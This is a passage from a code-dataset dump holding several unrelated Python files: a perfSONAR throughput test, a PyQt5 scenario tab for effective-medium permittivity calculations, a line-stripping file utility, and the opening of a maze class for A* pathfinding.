self.get_output([])\n\n checks = {\n 'maintainer': {\n 'href': 'http://www.perfsonar.net', \n 'name': 'perfSONAR Development Team',\n 'email': 'perfsonar-developer@internet2.edu',\n },\n 'description': 'Measure network throughput between hosts', \n 'version': '1.0', \n 'scheduling-class': 'exclusive', \n 'schema': 1, \n 'name': 'throughput'\n }\n \n for key, val in checks.items():\n if key not in data.keys(): self.fail(\"Missing output key %s\" % key) \n self.assertEqual(val, data[key])\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"pscheduler-test-throughput/throughput/tests/test-enumerate.py","file_name":"test-enumerate.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"593184921","text":"# -*- coding: utf8 -*-\nimport sys\nimport os.path\nimport numpy as np\nimport Python.Calculator as Calculator\nfrom PyQt5.QtWidgets import QPushButton, QWidget\nfrom PyQt5.QtWidgets import QComboBox, QLabel, QLineEdit, QDoubleSpinBox\nfrom PyQt5.QtWidgets import QVBoxLayout, QHBoxLayout, QFormLayout\nfrom PyQt5.QtWidgets import QSpinBox\nfrom PyQt5.QtCore import Qt\nfrom Python.Constants import support_matrix_db, wavenumber, amu, PI\nfrom Python.Constants import avogadro_si\nfrom Python.Utilities import Debug\n\nclass ScenarioTab(QWidget):\n def __init__(self, parent, debug=False): \n super(QWidget, self).__init__(parent)\n global debugger\n debugger = Debug(debug,'ScenarioTab:')\n self.dirty = True\n self.settings = {}\n self.notebook = parent\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n matrix = 'ptfe'\n self.settings['Matrix'] = matrix\n self.settings['Matrix density'] = support_matrix_db[matrix][0]\n self.settings['Matrix permittivity'] = support_matrix_db[matrix][1]\n self.settings['Bubble radius'] = 30.0\n self.settings['Bubble volume fraction'] = 0.0\n self.settings['Mass fraction'] = 0.1\n self.settings['Volume fraction'] = 0.1\n self.settings['Particle size(mu)'] = 0.0001\n self.settings['Particle size distribution sigma(mu)'] = 0.0\n self.settings['Ellipsoid a/b'] = 1.0\n self.settings['Unique direction - h'] = 0\n self.settings['Unique direction - k'] = 0\n self.settings['Unique direction - l'] = 1\n self.settings['Mass or volume fraction'] = 'volume'\n self.settings['ATR material refractive index'] = 4.0\n self.settings['ATR theta'] = 45.0\n self.settings['ATR S polarisation fraction'] = 0.5\n # get the reader from the main tab\n self.notebook = parent\n self.reader = self.notebook.mainTab.reader\n self.settings['Effective medium method'] = 'Maxwell-Garnett'\n # self.methods = ['Maxwell-Garnett', 'Bruggeman', 'Averaged Permittivity', 'Mie', 'Anisotropic-Mie']\n self.methods = ['Maxwell-Garnett', 'Bruggeman', 'Averaged Permittivity', 'Mie']\n self.settings['Particle shape'] = 'Sphere'\n self.shapes = ['Sphere', 'Needle', 'Plate', 'Ellipsoid']\n self.scenarioIndex = None\n # Create a scenario tab \n vbox = QVBoxLayout()\n form = QFormLayout()\n #\n # Support matrix\n #\n self.matrix_cb = QComboBox(self)\n self.matrix_cb.setToolTip('Define the permittivity and density of the support matrix')\n self.matrix_cb.addItems(support_matrix_db)\n index = self.matrix_cb.findText(self.settings['Matrix'], Qt.MatchFixedString)\n if index >=0:\n self.matrix_cb.setCurrentIndex(index)\n else:\n print('support matrix index was not 0',matrix)\n self.matrix_cb.activated.connect(self.on_matrix_cb_activated)\n label = QLabel('Support 
matrix',self)\n label.setToolTip('Define the permittivity and density of the support matrix')\n form.addRow(label, self.matrix_cb)\n #\n # Support matrix permittivity\n #\n self.density_sb = QDoubleSpinBox(self) \n self.density_sb.setRange(0.001, 100.0)\n self.density_sb.setSingleStep(0.01)\n self.density_sb.setDecimals(3)\n self.density_sb.setToolTip('Define the support matrix density. \\nThis makes changes to the support density and permittivity')\n self.density_sb.setValue(self.settings['Matrix density'])\n self.density_sb.valueChanged.connect(self.on_density_sb_changed)\n label = QLabel('Support density', self)\n label.setToolTip('Define the support matrix density. \\nThis makes changes to the support density and permittivity')\n form.addRow(label, self.density_sb)\n #\n # Support matrix permittivity\n #\n self.permittivity_sb = QDoubleSpinBox(self) \n self.permittivity_sb.setRange(0.001, 100.0)\n self.permittivity_sb.setSingleStep(0.01)\n self.permittivity_sb.setDecimals(3)\n self.permittivity_sb.setToolTip('Define the support matrix permittivity')\n self.permittivity_sb.setValue(self.settings['Matrix permittivity'])\n self.permittivity_sb.valueChanged.connect(self.on_permittivity_sb_changed)\n label = QLabel('Support permittivity', self)\n label.setToolTip('Define the support matrix permittivity')\n form.addRow(label, self.permittivity_sb)\n #\n # Bubble volume fraction\n #\n self.bubble_vf_sb = QDoubleSpinBox(self) \n self.bubble_vf_sb.setRange(0.0, 100.0*(1.0-self.settings['Volume fraction']))\n self.bubble_vf_sb.setSingleStep(1.0)\n self.bubble_vf_sb.setDecimals(1)\n self.bubble_vf_sb.setToolTip('Define the % volume fraction of air bubble inclusions in the matrix')\n self.bubble_vf_sb.setValue(100*self.settings['Bubble volume fraction'])\n self.bubble_vf_sb.valueChanged.connect(self.on_bubble_vf_sb_changed)\n label = QLabel('% Air void volume fraction', self)\n label.setToolTip('Define the % volume fraction of air bubble inclusions in the matrix')\n form.addRow(label, self.bubble_vf_sb)\n #\n # Bubble radius in microns\n #\n self.bubble_radius_sb = QDoubleSpinBox(self) \n self.bubble_radius_sb.setRange(0.001, 1000.0)\n self.bubble_radius_sb.setSingleStep(1.0)\n self.bubble_radius_sb.setDecimals(3)\n self.bubble_radius_sb.setToolTip('Define the air bubble radius')\n self.bubble_radius_sb.setValue(self.settings['Bubble radius'])\n self.bubble_radius_sb.valueChanged.connect(self.on_bubble_radius_sb_changed)\n label = QLabel('Air void radius (μm)', self)\n label.setToolTip('Define the air void radius')\n form.addRow(label, self.bubble_radius_sb)\n #\n # Mass fraction of dielectric medium\n #\n self.mf_sb = QDoubleSpinBox(self)\n self.mf_sb.setRange(0.000001, 100.0)\n self.mf_sb.setSingleStep(0.1)\n self.mf_sb.setDecimals(6)\n self.mf_sb.setToolTip('The percentage mass fraction of the dielectric medium. \\nNote that volume and mass fraction are linked')\n self.mf_sb.setValue(100.0*self.settings['Mass fraction'])\n self.mf_sb.valueChanged.connect(self.on_mf_sb_changed)\n label = QLabel('% Mass fraction of dielectric', self)\n label.setToolTip('The percentage mass fraction of the dielectric medium. \\nNote that volume and mass fraction are linked')\n form.addRow(label, self.mf_sb)\n #\n # Volume fraction of dielectric medium\n #\n self.vf_sb = QDoubleSpinBox(self)\n self.vf_sb.setRange(0.000001, 100.0*(1.0-self.settings['Bubble volume fraction']))\n self.vf_sb.setSingleStep(0.1)\n self.vf_sb.setDecimals(6)\n self.vf_sb.setToolTip('The percentage volume fraction of the dielectric medium. 
\\nNote that volume and mass fraction are linked')\n self.vf_sb.valueChanged.connect(self.on_vf_sb_changed)\n self.vf_sb.setValue(100.0*self.settings['Volume fraction'])\n label = QLabel('% Volume fraction of dielectric', self)\n label.setToolTip('The percentage volume fraction of the dielectric medium. \\nNote that volume and mass fraction are linked')\n form.addRow(label, self.vf_sb)\n #\n # Calculation method\n #\n self.methods_cb = QComboBox(self)\n self.methods_cb.setToolTip('Choose the calculation method for the effective medium theory')\n self.methods_cb.addItems(self.methods)\n index = self.methods_cb.findText(self.settings['Effective medium method'], Qt.MatchFixedString)\n if index >=0:\n self.methods_cb.setCurrentIndex(index)\n else:\n print('Method index was not 0',self.settings['Effective medium method'])\n self.methods_cb.activated.connect(self.on_methods_cb_activated)\n label = QLabel('Method',self)\n label.setToolTip('Choose the calculation method for the effective medium theory')\n form.addRow(label, self.methods_cb)\n #\n # Particle size option\n #\n self.size_sb = QDoubleSpinBox(self)\n self.size_sb.setRange(0.000001, 1000.0)\n self.size_sb.setSingleStep(0.1)\n self.size_sb.setDecimals(6)\n self.size_sb.setToolTip('Define the particle radius of the sphere in μm.')\n self.size_sb.setValue(self.settings['Particle size(mu)'])\n self.size_sb.valueChanged.connect(self.on_size_sb_changed)\n label = QLabel('Particle radius (μm)',self)\n label.setToolTip('Define the particle radius of the sphere in μm.')\n form.addRow(label, self.size_sb)\n #\n # Particle sigma option\n #\n self.sigma_sb = QDoubleSpinBox(self)\n self.sigma_sb.setRange(0.0, 1000.0)\n self.sigma_sb.setSingleStep(0.1)\n self.sigma_sb.setDecimals(6)\n self.sigma_sb.setToolTip('Define the particle size distribution as a lognormal distribution with the given sigma. \\nOnly applicable for the Mie method')\n self.sigma_sb.setValue(self.settings['Particle size distribution sigma(mu)'])\n self.sigma_sb.valueChanged.connect(self.on_sigma_sb_changed)\n label = QLabel('Particle sigma (μm)',self)\n label.setToolTip('Define the particle size distribition as a lognormal with the given sigma. \\nOnly applicable for the Mie method')\n form.addRow(label, self.sigma_sb)\n #\n # Crystallite shape\n #\n self.shape_cb = QComboBox(self)\n self.shape_cb.setToolTip('Choose a particle shape. \\nFor the Mie methods only sphere is allowed. \\nFor shapes other than sphere there is a unique direction. \\nFor ellipsoidal and needle like this is a direction [abc]. \\nFor a plate the perpendicular to a crystal face (hkl) is used to define the unique direction')\n self.shape_cb.addItems(self.shapes)\n index = self.shape_cb.findText(self.settings['Particle shape'], Qt.MatchFixedString)\n if index >=0:\n self.shape_cb.setCurrentIndex(index)\n else:\n print('Method index was not 0',self.settings['Particle shape'])\n self.shape_cb.activated.connect(self.on_shape_cb_activated)\n label = QLabel('Particle shape',self)\n label.setToolTip('Choose a particle shape. \\nFor the Mie methods only sphere is allowed. \\nFor shapes other than sphere there is a unique direction. \\nFor ellipsoidal and needle like this is a direction [abc]. 
\\nFor a plate the perpendicular to a crystal face (hkl) is used to define the unique direction')\n form.addRow(label, self.shape_cb)\n #\n # Particle shape information\n # unique direction (hkl) or [abc]\n self.h_sb = QSpinBox(self)\n self.h_sb.setToolTip('Define the h dimension of the unique direction')\n self.h_sb.setRange(-20,20)\n self.h_sb.setValue(self.settings['Unique direction - h'])\n self.h_sb.valueChanged.connect(self.on_h_sb_changed)\n self.k_sb = QSpinBox(self)\n self.k_sb.setToolTip('Define the k dimension of the unique direction')\n self.k_sb.setRange(-20,20)\n self.k_sb.setValue(self.settings['Unique direction - k'])\n self.k_sb.valueChanged.connect(self.on_k_sb_changed)\n self.l_sb = QSpinBox(self)\n self.l_sb.setToolTip('Define the l dimension of the unique direction')\n self.l_sb.setRange(-20,20)\n self.l_sb.setValue(self.settings['Unique direction - l'])\n self.l_sb.valueChanged.connect(self.on_l_sb_changed)\n hbox = QHBoxLayout()\n hbox.addWidget(self.h_sb)\n hbox.addWidget(self.k_sb)\n hbox.addWidget(self.l_sb)\n self.hkl_label = QLabel('Unique direction [abc]',self)\n self.hkl_label.setToolTip('Define the unique direction by [abc] or (hkl). \\n[abc] is used by needles and ellipsoids. It defines the unique direction in crystallographic units. \\n(hkl) is used by plates it defines a surface and the unique direction is perpendicular to it.')\n\n form.addRow(self.hkl_label, hbox)\n #\n # a over b ratio for ellipse\n #\n self.aoverb_sb = QDoubleSpinBox(self)\n self.aoverb_sb.setRange(0.0, 1000.0)\n self.aoverb_sb.setSingleStep(0.1)\n self.aoverb_sb.setDecimals(6)\n self.aoverb_sb.setToolTip('Define the ellipsoid a/b ratio or eccentricity. \\nOnly applicable for the ellipsoid shapes \\na/b < 1: oblate ellipsoid \\na/b > 1: prolate ellipsoid')\n self.aoverb_sb.setValue(self.settings['Ellipsoid a/b'])\n self.aoverb_sb.valueChanged.connect(self.on_aoverb_sb_changed)\n label = QLabel('Ellipsoid a/b eccentricty',self)\n label.setToolTip('Define the ellipsoid a/b ratio or eccentricity. 
\\nOnly applicable for the ellipsoid shapes \\na/b < 1: oblate ellipsoid \\na/b > 1: prolate ellipsoid')\n form.addRow(label, self.aoverb_sb)\n #\n # Add ATR options\n # Refractive Index\n self.atr_index_sb = QDoubleSpinBox(self) \n self.atr_index_sb.setRange(0.001, 100.0)\n self.atr_index_sb.setSingleStep(0.01)\n self.atr_index_sb.setDecimals(3)\n self.atr_index_sb.setToolTip('Define the ATR material refractive index')\n self.atr_index_sb.setValue(self.settings['ATR material refractive index'])\n self.atr_index_sb.valueChanged.connect(self.on_atr_index_sb_changed)\n label = QLabel('ATR material refractive index', self)\n label.setToolTip('Define the ATR material refractive index')\n form.addRow(label, self.atr_index_sb)\n # Incident angle in degreees\n self.atr_incident_ang_sb = QDoubleSpinBox(self) \n self.atr_incident_ang_sb.setRange(0.0, 180.0)\n self.atr_incident_ang_sb.setSingleStep(0.1)\n self.atr_incident_ang_sb.setDecimals(1)\n self.atr_incident_ang_sb.setToolTip('Define the ATR incident angle')\n self.atr_incident_ang_sb.setValue(self.settings['ATR theta'])\n self.atr_incident_ang_sb.valueChanged.connect(self.on_atr_incident_ang_sb_changed)\n label = QLabel('ATR incident angle', self)\n label.setToolTip('Define the ATR incident angle')\n form.addRow(label, self.atr_incident_ang_sb)\n # S polarisation fraction\n self.atr_spolfrac_sb = QDoubleSpinBox(self) \n self.atr_spolfrac_sb.setRange(0.0, 1.0)\n self.atr_spolfrac_sb.setSingleStep(0.01)\n self.atr_spolfrac_sb.setDecimals(3)\n self.atr_spolfrac_sb.setToolTip('Define the ATR S polarisation fraction, the rest is P polarisation')\n self.atr_spolfrac_sb.setValue(self.settings['ATR S polarisation fraction'])\n self.atr_spolfrac_sb.valueChanged.connect(self.on_atr_spolfrac_sb_changed)\n label = QLabel('ATR S polarisation fraction', self)\n label.setToolTip('Define the S polarisation fraction, the rest is P polarisation')\n form.addRow(label, self.atr_spolfrac_sb)\n #\n # Add a legend option\n #\n self.legend_le = QLineEdit(self) \n self.legend_le.setToolTip('The legend will be used to describe the results in the plot')\n self.legend_le.setText('Scenario legend')\n self.legend_le.textChanged.connect(self.on_legend_le_changed)\n label = QLabel('Scenario legend',self)\n label.setToolTip('The legend will be used to describe the results in the plot')\n form.addRow(label, self.legend_le)\n\n #\n # Final buttons\n #\n hbox = QHBoxLayout()\n self.pushButton1 = QPushButton('Add another scenario')\n self.pushButton1.setToolTip('Use another scenario to calculate the effect of changing the material on the absorption and permittivity')\n self.pushButton1.clicked.connect(self.pushButton1Clicked)\n hbox.addWidget(self.pushButton1)\n self.pushButton3 = QPushButton('Delete this scenario')\n self.pushButton3.setToolTip('Delete the current scenario')\n self.pushButton3.clicked.connect(self.pushButton3Clicked)\n hbox.addWidget(self.pushButton3)\n form.addRow(hbox)\n vbox.addLayout(form)\n # finalise the layout\n self.setLayout(vbox)\n # sort out greying of boxes\n self.change_greyed_out()\n\n def pushButton1Clicked(self):\n # Add another scenario\n debugger.print('Button 1 pressed')\n self.notebook.addScenario(copyFromIndex=self.scenarioIndex)\n\n def pushButton3Clicked(self):\n # Delete a scenario\n debugger.print('Button 3 pressed')\n self.notebook.deleteScenario(self.scenarioIndex)\n\n def crystal_density(self):\n if not self.reader:\n return 1.0\n volume = self.reader.volume\n mass = 0.0\n for m in self.reader.masses:\n mass += m\n density = mass / 
(avogadro_si * volume * 1.0e-24)\n return density\n \n\n def on_h_sb_changed(self,value):\n debugger.print('on_h_sb_changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n self.settings['Unique direction - h'] = value\n\n def on_k_sb_changed(self,value):\n debugger.print('on_k_sb_changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n self.settings['Unique direction - k'] = value\n\n def on_l_sb_changed(self,value):\n debugger.print('on_l_sb_changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n self.settings['Unique direction - l'] = value\n\n def on_shape_cb_activated(self,index):\n debugger.print('on shape cb activated', index)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n self.settings['Particle shape'] = self.shapes[index]\n if self.settings['Particle shape'] == 'Sphere':\n self.settings['Unique direction - h'] = 0\n self.settings['Unique direction - k'] = 0\n self.settings['Unique direction - l'] = 0\n self.change_greyed_out()\n\n def on_methods_cb_activated(self,index):\n debugger.print('on methods cb activated', index)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n self.settings['Effective medium method'] = self.methods[index]\n if self.settings['Effective medium method'] == 'Mie':\n self.settings['Particle shape'] = 'Sphere'\n elif self.settings['Effective medium method'] == 'Anisotropic-Mie':\n self.settings['Particle shape'] = 'Sphere'\n elif self.settings['Effective medium method'] == 'Maxwell-Garnett':\n self.settings['Particle size distribution sigma(mu)'] = 0.0\n elif self.settings['Effective medium method'] == 'Bruggeman':\n self.settings['Particle size distribution sigma(mu)'] = 0.0\n elif self.settings['Effective medium method'] == 'Averaged Permittivity':\n self.settings['Particle size(mu)'] = 0.0001\n self.settings['Particle size distribution sigma(mu)'] = 0.0\n self.change_greyed_out()\n\n def on_mf_sb_changed(self,value):\n debugger.print('on mass fraction line edit changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n self.settings['Mass or volume fraction'] = 'mass'\n self.settings['Mass fraction'] = value/100.0\n self.update_vf_sb()\n\n def update_vf_sb(self):\n mf1 = self.settings['Mass fraction']\n mf2 = 1.0 - mf1\n rho1 = self.crystal_density()\n rho2 = self.settings['Matrix density']\n vf1 = ( 1.0 - self.settings['Bubble volume fraction'] ) * (mf1/mf2)*(rho2/rho1) / ( 1 + (mf1/mf2)*(rho2/rho1))\n# vf1 = 1.0 / ( 1.0 + mf2/mf1 * (rho1/rho2) )\n self.settings['Volume fraction'] = vf1\n self.vf_sb.blockSignals(True)\n self.vf_sb.setValue(100.0*vf1)\n self.vf_sb.blockSignals(False)\n self.bubble_vf_sb.setRange(0.0, 100.0*(1.0-self.settings['Volume fraction']))\n self.vf_sb.setRange(0.0, 100.0*(1.0-self.settings['Bubble volume fraction']))\n debugger.print('Update_vf_sb')\n debugger.print('rho 1', rho1)\n debugger.print('rho 2', rho2)\n debugger.print('vf 1 ', vf1)\n \n def on_aoverb_sb_changed(self,value):\n debugger.print('on_aoverb_le_changed',value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n 
self.settings['Ellipsoid a/b'] = value\n\n def on_legend_le_changed(self,text):\n debugger.print('on legend change', text)\n self.dirty = True\n self.settings['Legend'] = text\n\n def on_sigma_sb_changed(self,value):\n debugger.print('on sigma line edit changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n self.settings['Particle size distribution sigma(mu)'] = value\n\n def on_size_sb_changed(self,value):\n debugger.print('on size line edit changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n self.settings['Particle size(mu)'] = value\n\n def on_vf_sb_changed(self,value):\n debugger.print('on volume fraction line edit changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n self.settings['Mass or volume fraction'] = 'volume'\n self.settings['Volume fraction'] = value/100.0\n self.update_mf_sb()\n\n def update_mf_sb(self):\n vf1 = self.settings['Volume fraction']\n vf2 = 1.0 - vf1 - self.settings['Bubble volume fraction']\n rho1 = self.crystal_density()\n rho2 = self.settings['Matrix density']\n # mf1 = 1.0 / ( 1.0 + (vf2/vf1) * (rho2/rho1) )\n mf1 = rho1*vf1 / ( rho1*vf1 + rho2*vf2 )\n self.settings['Mass fraction'] = mf1\n self.mf_sb.blockSignals(True)\n self.mf_sb.setValue(100.0*mf1)\n self.mf_sb.blockSignals(False)\n debugger.print('Update_mf_sb')\n debugger.print('rho 1', rho1)\n debugger.print('rho 2', rho2)\n debugger.print('mf 1 ', mf1)\n\n def on_matrix_cb_activated(self,index):\n debugger.print('on matrix combobox activated', index)\n debugger.print('on matrix combobox activated', self.matrix_cb.currentText())\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n matrix = self.matrix_cb.currentText()\n self.matrix_cb.blockSignals(True)\n self.density_sb.blockSignals(True)\n self.permittivity_sb.blockSignals(True)\n self.settings['Matrix'] = matrix\n self.settings['Matrix density'] = support_matrix_db[matrix][0]\n self.settings['Matrix permittivity'] = support_matrix_db[matrix][1]\n self.density_sb.setValue(self.settings['Matrix density'])\n self.permittivity_sb.setValue(self.settings['Matrix permittivity'])\n # volume fraction takes precedence\n if self.settings['Mass or volume fraction'] == 'volume':\n self.update_mf_sb()\n self.update_vf_sb()\n else:\n self.update_vf_sb()\n self.update_mf_sb()\n self.matrix_cb.blockSignals(False)\n self.density_sb.blockSignals(False)\n self.permittivity_sb.blockSignals(False)\n\n def on_density_sb_changed(self,value):\n self.settings['Matrix density'] = value\n # volume fraction taked precedence\n if self.settings['Mass or volume fraction'] == 'volume':\n self.update_mf_sb()\n self.update_vf_sb()\n else:\n self.update_vf_sb()\n self.update_mf_sb()\n debugger.print('on density line edit changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n\n def on_bubble_vf_sb_changed(self,value):\n self.settings['Bubble volume fraction'] = value/100.0\n if self.settings['Mass or volume fraction'] == 'volume':\n self.update_mf_sb()\n else:\n self.update_vf_sb()\n debugger.print('on bubble volume fraction changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n\n def 
on_bubble_radius_sb_changed(self,value):\n self.settings['Bubble radius'] = value\n debugger.print('on permittivity line edit changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n\n def on_permittivity_sb_changed(self,value):\n self.settings['Matrix permittivity'] = value\n debugger.print('on permittivity line edit changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n\n def on_atr_index_sb_changed(self,value):\n self.settings['ATR material refractive index'] = value\n debugger.print('on atr index line edit changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n\n def on_atr_incident_ang_sb_changed(self,value):\n self.settings['ATR theta'] = value\n debugger.print('on atr incident angle line edit changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n\n def on_atr_spolfrac_sb_changed(self,value):\n self.settings['ATR S polarisation fraction'] = value\n debugger.print('on atr spolfraction line edit changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n\n def set_reader(self,reader):\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n self.reader = reader\n\n def change_greyed_out(self):\n # Have a look through the settings and see if we need to grey anything out\n method = self.settings['Effective medium method']\n if method == 'Mie' or method == 'Anisotropic-Mie':\n self.size_sb.setEnabled(True)\n self.sigma_sb.setEnabled(True)\n for i,shape in enumerate(self.shapes):\n self.shape_cb.model().item(i).setEnabled(False)\n self.settings['Particle shape'] = 'Sphere'\n self.shape_cb.setEnabled(True)\n index = self.shape_cb.findText(self.settings['Particle shape'], Qt.MatchFixedString)\n if index >=0:\n self.shape_cb.model().item(index).setEnabled(True)\n self.shape_cb.setCurrentIndex(index)\n else:\n print('Method index was not 0',self.settings['Particle shape'])\n elif method == 'Averaged Permittivity':\n self.size_sb.setEnabled(False)\n self.sigma_sb.setEnabled(False)\n self.settings['Particle shape'] = 'Sphere'\n index = self.shape_cb.findText(self.settings['Particle shape'], Qt.MatchFixedString)\n if index >=0:\n self.shape_cb.model().item(index).setEnabled(True)\n self.shape_cb.setCurrentIndex(index)\n self.shape_cb.setEnabled(False)\n for i,shape in enumerate(self.shapes):\n self.shape_cb.model().item(i).setEnabled(False)\n elif method == 'Maxwell-Garnett' or method == 'Bruggeman':\n self.size_sb.setEnabled(True)\n self.sigma_sb.setEnabled(False)\n self.shape_cb.setEnabled(True)\n for i,shape in enumerate(self.shapes):\n self.shape_cb.model().item(i).setEnabled(True)\n else:\n self.size_sb.setEnabled(False)\n self.sigma_sb.setEnabled(False)\n self.shape_cb.setEnabled(True)\n for i,shape in enumerate(self.shapes):\n self.shape_cb.model().item(i).setEnabled(True)\n # deal with shapes\n if self.settings['Particle shape'] == 'Ellipsoid':\n self.h_sb.setEnabled(True)\n self.k_sb.setEnabled(True)\n self.l_sb.setEnabled(True)\n self.hkl_label.setText('Unique direction [abc]')\n self.aoverb_sb.setEnabled(True)\n elif self.settings['Particle shape'] == 'Plate':\n self.h_sb.setEnabled(True)\n 
self.k_sb.setEnabled(True)\n self.l_sb.setEnabled(True)\n self.hkl_label.setText('Unique direction (hkl)')\n self.aoverb_sb.setEnabled(False)\n elif self.settings['Particle shape'] == 'Needle':\n self.h_sb.setEnabled(True)\n self.k_sb.setEnabled(True)\n self.l_sb.setEnabled(True)\n self.hkl_label.setText('Unique direction [abc]')\n self.aoverb_sb.setEnabled(False)\n elif self.settings['Particle shape'] == 'Sphere':\n self.h_sb.setEnabled(False)\n self.k_sb.setEnabled(False)\n self.l_sb.setEnabled(False)\n self.aoverb_sb.setEnabled(False)\n else:\n print('ScenarioTab: Shape not recognised', self.settings['Particle shape'])\n \n def setScenarioIndex(self,index):\n self.scenarioIndex = index\n text = self.legend_le.text()\n if text == 'Scenario legend':\n self.legend_le.setText('Scenario '+str(index + 1))\n return\n\n def print_settings(self):\n print('#')\n print('# Scenario tab')\n print('#')\n print('tab = self.notebook.scenarios')\n for key in self.settings:\n print(key, self.settings[key]) \n \n def refresh(self,force=False):\n if not self.dirty and not force:\n debugger.print('refresh aborted', self.dirty,force)\n return\n debugger.print('refresh', force)\n # Tell the main notebook that we need to recalculate any plot\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n # First see if we can get the reader from the mainTab\n self.reader = self.notebook.mainTab.reader\n #\n # Block signals during refresh\n # \n for w in self.findChildren(QWidget):\n w.blockSignals(True)\n # use the settings values to initialise the widgets\n index = self.matrix_cb.findText(self.settings['Matrix'], Qt.MatchFixedString)\n self.matrix_cb.setCurrentIndex(index)\n self.density_sb.setValue(self.settings['Matrix density'])\n self.permittivity_sb.setValue(self.settings['Matrix permittivity'])\n self.bubble_vf_sb.setValue(100*self.settings['Bubble volume fraction'])\n self.bubble_radius_sb.setValue(self.settings['Bubble radius'])\n if self.settings['Mass or volume fraction'] == 'volume':\n # volume fraction takes precedence\n self.update_mf_sb()\n self.update_vf_sb()\n else:\n # mass fraction takes precedence\n self.update_vf_sb()\n self.update_mf_sb()\n #\n index = self.methods_cb.findText(self.settings['Effective medium method'], Qt.MatchFixedString)\n self.methods_cb.setCurrentIndex(index)\n self.size_sb.setValue(self.settings['Particle size(mu)'])\n self.sigma_sb.setValue(self.settings['Particle size distribution sigma(mu)'])\n index = self.shape_cb.findText(self.settings['Particle shape'], Qt.MatchFixedString)\n self.shape_cb.setCurrentIndex(index)\n self.h_sb.setValue(self.settings['Unique direction - h'])\n self.k_sb.setValue(self.settings['Unique direction - k'])\n self.l_sb.setValue(self.settings['Unique direction - l'])\n self.aoverb_sb.setValue(self.settings['Ellipsoid a/b'])\n self.legend_le.setText(self.settings['Legend'])\n self.change_greyed_out()\n #\n # Unblock signals after refresh\n # \n for w in self.findChildren(QWidget):\n w.blockSignals(False)\n self.dirty = False\n return\n","sub_path":"Python/GUI/ScenarioTab.py","file_name":"ScenarioTab.py","file_ext":"py","file_size_in_byte":32863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"45559702","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport os\n\n\ndef clfile(filename):\n n = raw_input('''\n c:creat a new file\n o:overwrite this file\n ''')\n if n == 'c':\n f = open(filename, 'r')\n a = filename + '1'\n l = open(a, 'w')\n m 
= map(lambda x: x.strip(), f)\n for i in m:\n l.write(i)\n l.write(os.linesep)\n l.close()\n if n == 'o':\n f = open(filename, 'r')\n m = map(lambda x: x.strip(), f)\n f.close()\n f = open(filename, 'w')\n for i in m:\n f.write(i)\n f.write(os.linesep)\n f.close()\n\n\nif __name__ == '__main__':\n clfile('10.eg')\n","sub_path":"11/10.py","file_name":"10.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"215351742","text":"#!/usr/bin/env python\r\n# -*- encoding: utf-8 -*-\r\n'''\r\n@FileName: Maze.py\r\n@Abstract: Maze class\r\n@Time: 2021/03/11 08:05:33\r\n@Requirements: \r\n@Author: WangZy ntu.wangzy@gmail.com\r\n@Version: -\r\n'''\r\n\r\nimport random\r\nfrom typing import NamedTuple\r\nfrom enum import Enum\r\nfrom math import sqrt\r\nfrom A_star import manhattan_distance, astar, node_to_path, Node\r\n\r\nclass Cell(str, Enum):\r\n EMPTY = ' '\r\n BLOCKED = 'X'\r\n START = 'S'\r\n GOAL = 'G'\r\n PATH = '@'\r\n\r\nclass MazeLocation(NamedTuple):\r\n row: int\r\n column: int\r\n\r\nclass Maze:\r\n def __init__(self, rows=10, columns=10, sparseness=0.2, start=MazeLocation(0, 0), goal=MazeLocation(9, 9)):\r\n # initialize instance variables\r\n self._rows = rows\r\n self._columns = columns\r\n self.start = start\r\n self.goal = goal\r\n self._grid = [[Cell.EMPTY for c in range(columns)] for r in range(rows)]\r\n # fill blocked cells\r\n self._randomly_fill(rows, columns, sparseness)\r\n # fill the start and goal\r\n self._grid[start.row][start.column] = Cell.START\r\n self._grid[goal.row][goal.column] = Cell.GOAL\r\n \r\n def _randomly_fill(self, rows, columns, sparseness):\r\n for row in range(rows):\r\n for column in range(columns):\r\n if random.uniform(0, 1.0) < sparseness:\r\n self._grid[row][column] = Cell.BLOCKED\r\n 